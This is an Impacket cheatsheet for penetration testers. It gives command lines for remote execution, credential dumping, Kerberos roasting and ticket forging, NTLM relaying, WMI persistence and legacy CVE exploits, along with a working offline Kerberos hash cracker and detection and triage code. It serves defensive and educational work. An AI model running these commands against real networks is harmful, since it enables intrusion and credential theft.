Impacket Cheatsheet For Penetration Testers

Impacket is a collection of Python classes for working with network protocols, built for low-level programmatic access to SMB, MSRPC, Kerberos, LDAP and the other Windows protocols, plus a set of example scripts that turn those classes into ready-to-use tools. This Impacket cheatsheet walks through the most useful of those scripts, what each one does on the wire and on the target, and how it is invoked in an authorised penetration test.

The scripts live in Impacket's examples/ directory; on Kali they are also installed on the PATH as impacket-<name> (for example impacket-psexec). Most of them take the target in the form [[domain/]username[:password]@]<targetName or address> and accept -hashes LMHASH:NTHASH for pass-the-hash, -k (with a ccache pointed to by KRB5CCNAME) for Kerberos authentication, -aesKey and -dc-ip; check each script's help output for the exact set. Used against systems you are authorised to test, they show how a Windows estate stands up to the same techniques real attackers use.

Executing remote commands

psexec.py

psexec.py provides functionality similar to Sysinternals PsExec: it uploads the RemComSvc service binary to a writeable share (normally ADMIN$), creates and starts a service that runs it, and exchanges the shell's stdin/stdout over a named pipe, giving an interactive SYSTEM shell. It is the noisiest of the execution methods (a dropped binary plus a new service, logged as event 7045 on the target), and antivirus commonly flags the RemComSvc binary. The following command example demonstrates how you could utilize psexec.py:

python psexec.py domain/user:password@target_machine

smbexec.py: PSEXEC Alternative without RemComSvc

smbexec.py is another take on PSEXEC that needs no RemComSvc binary: for every command it creates a service whose binary path is a cmd.exe one-liner, lets it run, reads the output file and deletes the service again. By default the output is written to a share on the target (-share, C$ by default); with -mode SERVER the script instead starts a local SMB server and has the target write the output there, which is what makes it useful when the target has no writeable share. No executable is dropped, though the one-liner writes a transient %TEMP%\execute.bat, and each command generates a service-install event (7045) with the default service name BTOBTO (changeable with -service-name). Here's how to use smbexec.py:

python smbexec.py domain/user:password@target_machine

atexec.py: Leveraging Task Scheduler Service

atexec.py executes a command on the target machine through the Task Scheduler service (ATSVC/TSCH over MSRPC) and returns its output. It registers a one-off scheduled task that runs cmd.exe /C <command> with the output redirected to a file under %windir%\Temp, fetches that file over SMB and deletes the task, so it leaves a task-creation event (4698) and Task Scheduler operational-log entries behind. The command to run is a required positional argument:

python atexec.py domain/user:password@target_machine whoami

wmiexec.py: Semi-Interactive Shell via Windows Management Instrumentation

wmiexec.py offers a semi-interactive shell through Windows Management Instrumentation (WMI). It installs no service or agent on the target and runs as the authenticating user (who must be a local Administrator), which is why Impacket's own documentation calls it highly stealthy. That claim needs a caveat: by default each command is spawned as cmd.exe under WmiPrvSE.exe with its output redirected to a file in the ADMIN$ share (\\127.0.0.1\ADMIN$\__<timestamp>) that wmiexec then reads over SMB and deletes, so process-creation logging and SMB auditing both see it; -nooutput avoids the output file at the cost of seeing no results. An example of wmiexec.py command would be:

python wmiexec.py domain/user:password@target_machine

dcomexec.py: Utilizing Different DCOM Endpoints

dcomexec.py offers a semi-interactive shell akin to wmiexec.py but employs different DCOM endpoints. This technique currently supports MMC20.Application, ShellWindows, and ShellBrowserWindow objects. Here’s an example of a dcomexec.py command:

python dcomexec.py domain/user:password@target_machine
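The flip side of the execution scripts above, as an added example that is not part of the original page or of Impacket: the host-side traces each one leaves by default. The rules below encode psexec.py's RemCom_communicaton named pipe, smbexec.py's BTOBTO service and \\127.0.0.1\C$\__output one-liner, atexec.py's cmd.exe /C ... > %windir%\Temp\<random>.tmp task and wmiexec.py's cmd.exe child of WmiPrvSE.exe writing to \\127.0.0.1\ADMIN$\__<timestamp>. The events are constructed, simplified process/service/pipe records rather than real Windows log entries, and every one of these defaults can be changed by the operator (-service-name, -nooutput), so a miss proves nothing.

```python
"""Host-side traces of Impacket's remote-execution scripts (psexec, smbexec,
atexec, wmiexec). Added example, not Impacket code: the rules encode each
script's default behaviour and the events are constructed test records."""
import re
from dataclasses import dataclass


@dataclass
class Event:
    kind: str     # "process" (4688 / Sysmon 1), "service" (7045), "pipe" (Sysmon 17/18)
    fields: dict  # host, parent, image, cmdline, name, image_path, pipe ...


# (script, event kind, predicate over the event's fields)
RULES = [
    # wmiexec: WmiPrvSE.exe spawns cmd.exe redirecting output to \\127.0.0.1\ADMIN$\__<timestamp>
    ("wmiexec", "process", lambda f: f.get("parent", "").lower().endswith("wmiprvse.exe")
        and re.search(r"\\\\127\.0\.0\.1\\ADMIN\$\\__\d", f.get("cmdline", "")) is not None),
    # smbexec: a service (default name BTOBTO) whose binary path is a cmd.exe one-liner
    # writing to \\127.0.0.1\C$\__output via %TEMP%\execute.bat
    ("smbexec", "service", lambda f: f.get("name") == "BTOBTO"
        or r"\C$\__output" in f.get("image_path", "")),
    # psexec: RemComSvc talks over the RemCom_communicaton pipe (the typo is RemCom's own)
    ("psexec", "pipe", lambda f: f.get("pipe", "").lower().endswith("remcom_communicaton")),
    # atexec: a scheduled task (parent svchost.exe) running cmd.exe /C <cmd> > %windir%\Temp\<random>.tmp
    ("atexec", "process", lambda f: f.get("parent", "").lower().endswith("svchost.exe")
        and re.search(r">\s*%windir%\\Temp\\\w+\.tmp", f.get("cmdline", "")) is not None),
]


def detect_impacket_exec(events):
    """Return [(script, host), ...] for every event that matches a rule."""
    hits = []
    for ev in events:
        for script, kind, pred in RULES:
            if ev.kind == kind and pred(ev.fields):
                hits.append((script, ev.fields.get("host")))
    return hits


SAMPLE_EVENTS = [  # constructed test data
    Event("process", {"host": "WS01", "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
                      "image": r"C:\Windows\System32\cmd.exe",
                      "cmdline": r"cmd.exe /Q /c whoami 1> \\127.0.0.1\ADMIN$\__1700000000.12 2>&1"}),
    Event("service", {"host": "WS02", "name": "BTOBTO",
                      "image_path": r"%COMSPEC% /Q /c echo whoami ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat"}),
    Event("pipe", {"host": "WS03", "pipe": r"\RemCom_communicaton"}),
    Event("process", {"host": "WS04", "parent": r"C:\Windows\System32\svchost.exe",
                      "image": r"C:\Windows\System32\cmd.exe",
                      "cmdline": r"cmd.exe /C whoami > %windir%\Temp\AbCdEfGh.tmp 2>&1"}),
    Event("process", {"host": "WS05", "parent": r"C:\Windows\explorer.exe",   # benign
                      "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c dir"}),
]

if __name__ == "__main__":
    for script, host in detect_impacket_exec(SAMPLE_EVENTS):
        print(f"{host}: {script}-style remote execution")
```

The rules are deliberately keyed on the artefacts that cannot be avoided by the technique itself (a WMI-spawned shell, a service install, a scheduled task) rather than on the default strings alone, so a renamed service still shows up as a service whose binary path is a cmd.exe redirect.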

Kerberos

getTGT.py: Requesting a Ticket Granting Ticket

getTGT.py (the file name is lower-case, which matters on Linux) requests a Ticket Granting Ticket (TGT) using a password, NT hash or AES key and saves it as a ccache file named <user>.ccache in the current directory. Point KRB5CCNAME at that file and every other script accepts -k -no-pass to authenticate with the ticket instead of a password, which is how pass-the-ticket works with Impacket:

python getTGT.py domain/user:password
export KRB5CCNAME=user.ccache

getST.py: Requesting a Service Ticket

getST.py requests a Service Ticket (ST) for the SPN given with -spn and saves it as a ccache, authenticating with a password, hash, AES key or an existing TGT in the ccache. If the account has constrained delegation with protocol transition (TrustedToAuthForDelegation), add -impersonate to perform S4U2Self followed by S4U2Proxy and obtain the ticket on behalf of another user; -spn is required in that case and must name a service the account is allowed to delegate to. Here's an example:

python getST.py -spn cifs/target_fqdn -impersonate victim_user domain/user:password

getPac.py: Acquiring PAC Structure

getPac.py uses a mix of [MS-SFU]'s S4U2Self and User-to-User Kerberos authentication to obtain the PAC (Privilege Attribute Certificate) of a target user while holding only normal authenticated user credentials; the PAC lists the target's SID, group RIDs and logon information exactly as the KDC issues them. The target is given with -targetUser:

python getPac.py -targetUser target_user domain/user:password

GetUserSPNs.py: Fetching Service Principal Names

GetUserSPNs.py finds user accounts that have Service Principal Names (SPNs) registered and, with -request, obtains a service ticket for each one (Kerberoasting); the TGS-REP output is written in a format John the Ripper and hashcat accept, and -outputfile saves it. Any authenticated domain user can do this, so the defence is long random service-account passwords or gMSA, and AES-only service accounts (etype 17/18) are far slower to crack than RC4 (etype 23). Here's an example of this command:

python GetUserSPNs.py -request -dc-ip dc_ip -outputfile kerberoast.txt domain/user:password

GetNPUsers.py: Listing TGTs

GetNPUsers.py lists accounts that have the 'Do not require Kerberos preauthentication' flag set (UF_DONT_REQUIRE_PREAUTH) and retrieves an AS-REP for each (AS-REP roasting); the output is written in JtR or hashcat format, selected with -format. Because no preauthentication is involved, this works without any domain credentials given a list of candidate usernames, which also makes it a quiet way to confirm which usernames exist (the KDC answers KDC_ERR_C_PRINCIPAL_UNKNOWN for the others). Here's an example:

python GetNPUsers.py domain/ -usersfile users.txt -no-pass -dc-ip dc_ip -format hashcat
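Why both GetUserSPNs.py and GetNPUsers.py output cracks offline, as an added example that is not part of the original page or of Impacket: with RC4-HMAC (etype 23) the long-term key is simply the NT hash, and the encrypted part carries its own HMAC-MD5 checksum, so a password guess is verified locally without ever contacting the KDC, which is exactly what hashcat modes 18200 (AS-REP) and 13100 (TGS-REP) do. The code uses only the standard library and carries its own MD4 because hashlib's is often disabled under OpenSSL 3. The account names, realm, passwords and blob contents are constructed: a fixed confounder and dummy plaintext stand in for the real ASN.1 EncASRepPart / EncTicketPart, so the output strings match Impacket's format exactly but are not real KDC responses.

```python
"""RC4-HMAC (etype 23) offline verification of AS-REP roast / Kerberoast
output. Added example, not Impacket code; standard library only."""
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); the NT hash is MD4(UTF-16LE(password))."""
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & MASK
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for i in range(48):
            if i < 16:    # round 1: F, message words in order
                f, k, s = (b & c) | (~b & d), i, (3, 7, 11, 19)[i % 4]
            elif i < 32:  # round 2: G, words 0,4,8,12,1,5,...
                f, k, s = (b & c) | (b & d) | (c & d), (i % 4) * 4 + (i - 16) // 4, (3, 5, 9, 13)[i % 4]
            else:         # round 3: H, words 0,8,4,12,2,10,...
                f, k, s = b ^ c ^ d, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i - 32], (3, 9, 11, 15)[i % 4]
            f = (f + (0, 0x5A827999, 0x6ED9EBA1)[i // 16]) & MASK
            a, b, c, d = d, rotl((a + f + x[k]) & MASK, s), b, c
        h = [(v + w) & MASK for v, w in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    s, j = list(range(256)), 0
    for i in range(256):                          # key scheduling
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:                             # keystream generation
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def _hmac_md5(key: bytes, data: bytes) -> bytes:
    return hmac.new(key, data, hashlib.md5).digest()


def rc4_hmac_encrypt(key, usage, plaintext, confounder):
    """RFC 4757: K1 = HMAC(K, usage); checksum = HMAC(K1, conf||pt); edata = RC4(HMAC(K1, checksum), conf||pt)."""
    k1, data = _hmac_md5(key, struct.pack("<I", usage)), confounder + plaintext
    checksum = _hmac_md5(k1, data)
    return checksum, rc4(_hmac_md5(k1, checksum), data)


def rc4_hmac_verify(key, usage, checksum, edata) -> bool:
    """The cracker's inner loop: decrypt with the candidate key, recompute the checksum, compare."""
    k1 = _hmac_md5(key, struct.pack("<I", usage))
    plain = rc4(_hmac_md5(k1, checksum), edata)
    return hmac.compare_digest(_hmac_md5(k1, plain), checksum)


def parse_roast(line: str):
    """Both Impacket hashcat formats:
    $krb5asrep$23$user@REALM:checksum$edata     -> AS-REP enc-part, key usage 8
    $krb5tgs$23$*user$REALM$spn*$checksum$edata -> service-ticket enc-part, key usage 2"""
    parts = line.strip().split("$")
    usage = 8 if parts[1] == "krb5asrep" else 2
    return int(parts[2]), usage, bytes.fromhex(parts[-2].rsplit(":", 1)[-1]), bytes.fromhex(parts[-1])


def crack(line: str, wordlist):
    etype, usage, checksum, edata = parse_roast(line)
    if etype != 23:   # AES etypes 17/18 derive keys with PBKDF2: a different and much slower path
        return None
    return next((pw for pw in wordlist if rc4_hmac_verify(nt_hash(pw), usage, checksum, edata)), None)


def make_sample(kind: str, user: str, realm: str, password: str, spn: str = "") -> str:
    """Constructed blob in Impacket's output format: dummy plaintext, fixed confounder."""
    usage = 8 if kind == "krb5asrep" else 2
    checksum, edata = rc4_hmac_encrypt(nt_hash(password), usage, b"constructed EncPart", b"\x01" * 8)
    if kind == "krb5asrep":
        return f"$krb5asrep$23${user}@{realm}:{checksum.hex()}${edata.hex()}"
    return f"$krb5tgs$23$*{user}${realm}${spn}*${checksum.hex()}${edata.hex()}"


WORDLIST = ["Password1", "Summer2023!", "Welcome1"]   # constructed
SAMPLE_ASREP = make_sample("krb5asrep", "svc_backup", "CORP.LOCAL", "Summer2023!")
SAMPLE_TGS = make_sample("krb5tgs", "svc_sql", "CORP.LOCAL", "Welcome1", "MSSQLSvc/sql01.corp.local:1433")

if __name__ == "__main__":
    print(SAMPLE_ASREP)
    print("AS-REP:", crack(SAMPLE_ASREP, WORDLIST), "| TGS:", crack(SAMPLE_TGS, WORDLIST))
```

The same loop is what makes the etype matter so much in practice: each RC4 guess costs one MD4 and three HMAC-MD5s, whereas AES etypes need a PBKDF2 with 4096 iterations per guess, so forcing AES on service accounts buys several orders of magnitude of cracking time.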

rbcd.py: Handling the msDS-AllowedToActOnBehalfOfOtherIdentity Property

rbcd.py reads, writes or clears the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of a target computer, which holds the security descriptor for resource-based constrained delegation (RBCD). Writing a principal you control into it (for instance a machine account created with addcomputer.py) lets that principal impersonate users to the target with getST.py -impersonate. Writing the attribute needs GenericWrite, WriteDacl or ownership over the computer object, which is what makes over-permissioned ACLs on computer objects a privilege-escalation path. Example usage:

python rbcd.py -delegate-from 'attacker_pc$' -delegate-to 'target_pc$' -action write domain/user:password

ticketConverter.py: Converting Kirbi Files

ticketConverter.py converts kirbi files, the format used by mimikatz and Rubeus, into the ccache files Impacket uses, and vice versa; the direction is inferred from the input file, and both input and output paths are positional. An example of using this script might be:

python ticketConverter.py ticket.kirbi ticket.ccache

ticketer.py: Creating Golden/Silver Tickets

ticketer.py forges Golden/Silver tickets from scratch or from a template (a ticket legitimately requested from the KDC with -request), letting you set the fields of the PAC_LOGON_INFO structure such as the user RID and group membership. A Golden ticket needs the krbtgt account's NT hash or AES key plus the domain SID; a Silver ticket needs -spn and the service account's key instead. The forged ticket is written as <user>.ccache for use with -k. An example of this command is:

python ticketer.py -nthash krbtgt_nthash -domain-sid domain_sid -domain domain.local victim_user

Windows Swag

secretsdump.py: Dumping Secrets

secretsdump.py dumps password hashes, LSA secrets, cached domain credentials and, from a domain controller, the contents of NTDS.dit. It works in three modes: LOCAL against hives you already have (the SAM, SYSTEM and SECURITY files, or an NTDS.dit plus SYSTEM), remote over MSRPC (needs local-administrator credentials on the target), or remote with the VSS fallback (-use-vss, which uses the smbexec/wmiexec approach to copy the files). Examples:

python secretsdump.py domain/user:password@target
python secretsdump.py -sam SAM -system SYSTEM -security SECURITY LOCAL

kerbrute.py: Brute Forcing Kerberos

kerbrute.py is not part of the Impacket repository; it is a separate project built on Impacket (TarlogicSecurity/kerbrute) that tests username and password combinations against the KDC, which is useful for enumerating valid usernames and for password spraying. Username enumeration is quiet because a nonexistent principal is rejected with KDC_ERR_C_PRINCIPAL_UNKNOWN before any password is checked; password guesses against real accounts do count toward lockout and produce event 4771 on the DC. The option names below follow that project's README, so verify them against your checkout. Impacket's own GetNPUsers.py with -usersfile and -no-pass performs the username-enumeration half without an extra tool.

python kerbrute.py -domain domain.com -users userlist.txt -password Passw0rd!

karmaSMB.py: Rogue SMB File Server

karmaSMB.py is not a relay tool. It is an SMB server that answers every file request with the contents of a file you choose, whatever share and path the client asked for, so a client coaxed into fetching \\server\anything\update.exe (through LLMNR/NBT-NS poisoning, a planted UNC path or a hijacked update URL) receives your payload instead. The file to deliver is the positional argument; the script's help output also describes -config, which maps file extensions to different payloads. Here's an example of how to use this script:

python karmaSMB.py -smb2support /path/to/file_to_serve

karmaTFTP.py

No karmaTFTP.py ships with Impacket: karmaSMB.py has no TFTP counterpart in the examples directory, and the command python karmaTFTP.py -h target will not run (a reader points this out in the comments below). If a TFTP payload server is needed for the same MiTM scenario, use a dedicated TFTP tool; Impacket only implements the SMB side.

Windows Secrets

secretsdump.py

secretsdump.py performs several techniques to dump secrets from the remote machine without deploying any agent. For SAM and LSA Secrets (including cached credentials) it reads as much as it can straight from the remote registry, then saves the hives into the target's %SYSTEMROOT%\Temp directory and reads the remainder from there. For NTDS.dit it dumps NTLM hashes, plaintext credentials (when an account has reversible encryption enabled) and Kerberos keys through the DRSUAPI IDL_DRSGetNCChanges replication call, the same mechanism a domain controller uses to replicate; -use-vss instead copies NTDS.dit via vssadmin using the smbexec/wmiexec approach, and -just-dc / -just-dc-ntlm restrict the dump to the directory data. The script starts any services it needs (Remote Registry, even if disabled) and restores everything to its original state afterwards. On the target expect a 4624 network logon plus a Remote Registry service start; when a DC is dumped, also replication from a non-DC host, visible as event 4662 with the DS-Replication-Get-Changes-All GUID 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2 if directory object auditing is configured. The typical command usage is:

python secretsdump.py domain/user:password@target
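What to do with the output once you have it, as an added example that is not part of the original page or of Impacket: the SAM/NTDS lines secretsdump.py prints have the shape user:rid:lmhash:nthash::: (with a DOMAIN\ prefix on the DRSUAPI path and an optional " (status=Enabled|Disabled)" suffix when -user-status is used), and two checks need no cracking at all: accounts sharing an NT hash share a password, and the constants for the empty LM and NT hashes reveal missing LM-disable hardening and blank passwords. The dump below is constructed; its hash values are placeholders apart from those two well-known constants, and the status-suffix format is the one current versions print.

```python
"""Triage of secretsdump.py hash output without cracking anything.
Added example, not Impacket code; the sample dump is constructed."""
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM field when no LM hash is stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password


def parse_hash_line(line: str):
    """Return a dict for one user:rid:lm:nt::: line, or None for banners,
    Kerberos key lines, LSA secrets and anything else."""
    line, status = line.strip(), None
    if " (status=" in line and line.endswith(")"):        # -user-status suffix (assumed format)
        line, _, tail = line.rpartition(" (status=")
        status = tail[:-1]
    parts = line.split(":")
    if len(parts) != 7 or not parts[1].isdigit() or parts[4:] != ["", "", ""]:
        return None
    lm, nt = parts[2].lower(), parts[3].lower()
    if len(lm) != 32 or len(nt) != 32:
        return None
    user = parts[0].rsplit("\\", 1)[-1]                   # strip DOMAIN\ prefix
    return {"user": user, "rid": int(parts[1]), "lm": lm, "nt": nt,
            "machine": user.endswith("$"), "status": status}


def triage(dump_text: str) -> dict:
    """Summarise a dump: RID 500 account, blank passwords, LM hashes present,
    and user accounts sharing an NT hash (same hash == same password)."""
    accounts = [a for a in map(parse_hash_line, dump_text.splitlines()) if a]
    by_nt = defaultdict(list)
    for a in accounts:
        if not a["machine"]:                               # machine passwords are random; skip
            by_nt[a["nt"]].append(a["user"])
    return {
        "accounts": len(accounts),
        "rid_500": [a["user"] for a in accounts if a["rid"] == 500],
        "blank_password": sorted(a["user"] for a in accounts if a["nt"] == EMPTY_NT),
        "lm_stored": sorted(a["user"] for a in accounts if a["lm"] != EMPTY_LM),
        "shared_password": sorted(sorted(users) for nt, users in by_nt.items()
                                  if len(users) > 1 and nt != EMPTY_NT),
    }


SAMPLE_DUMP = """\
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
CORP.LOCAL\\Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef::: (status=Enabled)
CORP.LOCAL\\Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: (status=Disabled)
CORP.LOCAL\\krbtgt:502:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210::: (status=Disabled)
CORP.LOCAL\\svc_backup:1105:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef::: (status=Enabled)
CORP.LOCAL\\j.doe:1120:11111111111111111111111111111111:0123456789abcdef0123456789abcdef::: (status=Enabled)
CORP.LOCAL\\WS01$:1001:aad3b435b51404eeaad3b435b51404ee:00112233445566778899aabbccddeeff::: (status=Enabled)
[*] Kerberos keys grabbed
CORP.LOCAL\\Administrator:aes256-cts-hmac-sha1-96:00112233445566778899aabbccddeeff00112233445566778899aabbccddeeff
"""

if __name__ == "__main__":
    for key, value in triage(SAMPLE_DUMP).items():
        print(f"{key}: {value}")
```

In the constructed dump the built-in Administrator shares its hash with a service account and a regular user, which is the finding that matters for the report: one cracked or passed hash is three accounts, including the RID 500 one.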

mimikatz.py

mimikatz.py is a mini-shell that drives a remote mimikatz RPC server (the RPC mode of Benjamin Delpy's, @gentilkiwi, mimikatz). Through it mimikatz can extract plaintext passwords, hashes, PINs and Kerberos tickets from memory and perform pass-the-hash, pass-the-ticket or Golden ticket generation. The mimikatz RPC server must already be running on the target; the script only talks to it. Here's an example of how to use this script:

python mimikatz.py domain/user:password@target

Server Tools

ntlmrelayx.py

ntlmrelayx.py performs NTLM relay attacks by standing up SMB, HTTP, WCF and RAW listeners and relaying the authentication they capture to multiple protocols (SMB, HTTP, MSSQL, LDAP, IMAP, POP3, etc.). It can run predefined attacks when a connection is relayed (for example creating a user through LDAP) or run in SOCKS mode, in which every relayed session is kept open and exposed through a SOCKS proxy so it can be used repeatedly later. Relaying only works where the target does not enforce signing or channel binding: SMB signing defeats SMB relay, and LDAP signing plus LDAPS channel binding defeat LDAP relay. Targets are given with -t or -tf (-h is only the help switch). Here's an example of this command:

python ntlmrelayx.py -t smb://target -smb2support
python ntlmrelayx.py -tf targets.txt -smb2support -socks

karmaSMB.py

karmaSMB.py is an SMB server that responds to every file request with the contents of a file you specify, regardless of the share and pathname the client asked for. It is a MiTM payload-delivery tool rather than a relay: once a client has been redirected to your host (name poisoning, a planted UNC path), whatever it tries to download is replaced by your file. Here's an example of how to use this script:

python karmaSMB.py -smb2support /path/to/file_to_serve

smbserver.py

smbserver.py is a Python implementation of an SMB server that stands up a share in one command, optionally protected with -username and -password. In a test it is the usual way to move tools to a target or to receive command output and exfiltrated files (smbexec.py and secretsdump.py use the same class internally). Current Windows refuses SMB1 and guest access to shares by default, so add -smb2support and credentials:

python smbserver.py -smb2support -username user -password pass SHARE_NAME PATH_TO_SHARE

WMI

wmiquery.py

wmiquery.py opens an interactive WQL shell against the target's WMI service, so you can select from classes such as Win32_Account, Win32_Process or Win32_Service to inventory the system without dropping anything on disk. Queries are typed at the WQL> prompt or read from a file with -file; -namespace selects a namespace other than the default //./root/cimv2. An example session:

python wmiquery.py domain/user:password@target
WQL> select Name, SID from Win32_Account

wmipersist.py

wmipersist.py creates (install) or removes (remove) a WMI event filter, an ActiveScript event consumer and the binding between them, so the target runs the given VBScript whenever the WQL filter fires or a timer elapses. It is a textbook persistence mechanism, and defenders hunt for it by listing __EventFilter, __EventConsumer and __FilterToConsumerBinding instances in root\subscription (Sysmon events 19, 20 and 21). install takes -name, -vbs and either -timer (milliseconds) or -filter (a WQL query); remove takes the same -name:

python wmipersist.py domain/user:password@target install -name persist -vbs payload.vbs -timer 60000
python wmipersist.py domain/user:password@target remove -name persist

Exploiting Known Vulnerabilities

goldenPac.py

goldenPac.py exploits MS14-068 (CVE-2014-6324), a KDC bug that accepted PAC signatures made with the client's own key, so any domain user could forge a PAC claiming Domain Admins membership. The script builds the Golden ticket and immediately launches a PSEXEC session against the target with it. Microsoft patched the flaw in November 2014, so it only works against unpatched domain controllers and is a legacy-environment check today. An example command for using this script is:

python goldenPac.py domain/user:password@target

sambaPipe.py

SambaPipe.py is a script designed to exploit CVE-2017-7494. It uploads and executes the shared library specified by the user through the -so parameter. This could be useful in situations where the target system is vulnerable and code execution is desired. Here’s an example of using this script:

python sambaPipe.py -so /path/to/shared/library.so domain/user:password@target

smbrelayx.py

Smbrelayx.py is an exploit script for CVE-2015-0005 that uses an SMB Relay Attack. If the target system is enforcing signing and a machine account was provided, the module will attempt to gather the SMB session key through NETLOGON. This can potentially provide unauthorized access. An example of how to use this script is:

python smbrelayx.py -h target

SMB/MSRPC

smbclient.py

Smbclient.py is a general-purpose SMB client that lets you list shares and files, rename, upload and download files, and create and delete directories, all using either a username and password or a username and hash combination. It’s a great example of how to use the impacket.smb module in action. Here’s an example of using this script:

python smbclient.py domain/user:password@target

addcomputer.py

addcomputer.py adds a computer account to the domain over LDAPS or SAMR (-method), using the right every domain user has by default to join up to ms-DS-MachineAccountQuota (10) machines. Pentesters use the resulting account as a principal they control for RBCD (see rbcd.py) or as a stable foothold; the script can also delete an account (-delete) or only change the password of an existing one (-no-add). The credentials are those of the account performing the join, and the DC is given with -dc-ip or -dc-host:

python addcomputer.py -computer-name 'attacker_pc$' -computer-pass computer_password -dc-ip dc_ip domain/user:password

getArch.py

getArch.py connects to a target (or a list of targets with -targets) and reports whether the OS is 32- or 64-bit by (ab)using a documented MSRPC feature: it offers the NDR64 transfer syntax when binding to the endpoint mapper, which only a 64-bit host accepts. No credentials are needed, so it is a cheap early-recon step. An example of using this script is:

python getArch.py -target target

exchanger.py

exchanger.py talks to Microsoft Exchange over RPC over HTTP v2 (the Outlook Anywhere transport) and exposes the NSPI address-book interface, so an authenticated domain user can list and dump the Global Address List tables or resolve GUIDs and DNTs, an Exchange-side alternative to LDAP for user enumeration. Here's an example of how to use this script:

python exchanger.py domain/user:password@exchange_server nspi list-tables

lookupsid.py

LookupSid.py is a Windows SID brute forcer example through the [MS-LSAT] MSRPC Interface, aimed at finding remote users/groups. It’s an excellent script for information gathering in a penetration testing scenario. An example of using this script might be:

python lookupsid.py domain/user:password@target

netview.py

netview.py enumerates the sessions open on remote hosts (NetrSessionEnum) and the users logged on to them (NetrWkstaUserEnum), then keeps polling so you see who logs in and out over time; it is the classic way to find where a privileged user is logged on before moving laterally. The credential argument is separate from the hosts to query, which are given with -target or -targets (by default the script enumerates the domain's computers itself):

python netview.py domain/user:password -target target

reg.py

Reg.py is a remote registry manipulation tool through the [MS-RRP] MSRPC Interface, providing similar functionality as the REG.EXE Windows utility. It’s a powerful tool for remotely querying and modifying the Windows registry. Here’s an example of using this script:

python reg.py domain/user:password@target query -keyName HKLM\\SOFTWARE -s

rpcdump.py

Rpcdump.py dumps the list of RPC endpoints and string bindings registered at the target. It also attempts to match them with a list of well-known endpoints. This can provide insight into what RPC services are running on a target system. Here’s an example of using this script:

python rpcdump.py domain/user:password@target

rpcmap.py

rpcmap.py scans for listening DCE/RPC interfaces at a string binding. It first binds to the MGMT interface to list interface UUIDs; if MGMT is unavailable (or with -brute-uuids) it tries to bind to each UUID from a list observed in the wild, and -brute-opnums probes which operation numbers each interface implements. Unlike rpcdump.py it does not depend on the endpoint mapper, so it works against any RPC port, including those of third-party services. Here's an example of using this script:

python rpcmap.py 'ncacn_ip_tcp:target[135]' -brute-uuids -brute-opnums

samrdump.py

Samrdump.py is an application that communicates with the Security Account Manager Remote interface from the MSRPC suite. It lists system user accounts, available resource shares, and other sensitive information exported through this service. It’s a useful script for gathering information from a target system. An example of using this script might be:

python samrdump.py domain/user:password@target

services.py

Services.py can be used to manipulate Windows services through the [MS-SCMR] MSRPC Interface. It supports start, stop, delete, status, config, list, create, and change operations. This script can be valuable when you need to manage services on a remote Windows system. Here’s an example of using this script:

python services.py domain/user:password@target list

smbpasswd.py

smbpasswd.py is an alternative to Samba's smbpasswd tool for changing a password remotely over SMB (MSRPC-SAMR). It works even when the password has expired and interactive logon is therefore refused, and -newhashes sets a new NT hash directly instead of a password. It takes Impacket's target syntax, not Samba's -r/-U options:

python smbpasswd.py domain/user:oldpassword@target -newpass newpassword

Database Tools

mssqlinstance.py

mssqlinstance.py queries the SQL Server Browser service (UDP 1434) on the target and lists the instance names, versions and TCP ports it advertises. No credentials are needed, which makes it a quick first step before mssqlclient.py. Here's an example of using this script:

python mssqlinstance.py target

mssqlclient.py

mssqlclient.py is an MSSQL client supporting SQL authentication and Windows authentication (password, NT hash or Kerberos) over TLS. Its shell adds helpers for the usual post-exploitation steps, such as enabling and running xp_cmdshell, which is why SQL Servers with weak sa passwords or over-privileged service accounts are a common lateral-movement path. Use -windows-auth for domain credentials; without it the username is treated as a SQL login:

python mssqlclient.py domain/user:password@target -windows-auth

File Formats

esentutl.py

esentutl.py is an Extensible Storage Engine (ESE, "JET Blue") format implementation that dumps the catalog, pages and tables of ESE databases such as NTDS.dit, SRUDB.dat or the Windows Search index, entirely offline. Impacket's own NTDS parsing (secretsdump.py -ntds) is built on this module. Usage is the database file followed by an action (dump, info or export), with -table selecting the table to export:

python esentutl.py ntds.dit info
python esentutl.py ntds.dit export -table datatable

ntfs-read.py

Ntfs-read.py provides an NTFS format implementation. This script provides a mini-shell for browsing and extracting an NTFS volume, including hidden/locked contents. This can be useful in forensic investigations or in data recovery scenarios. Here’s an example of how to use this script:

python ntfs-read.py /path/to/ntfs/device

registry-read.py

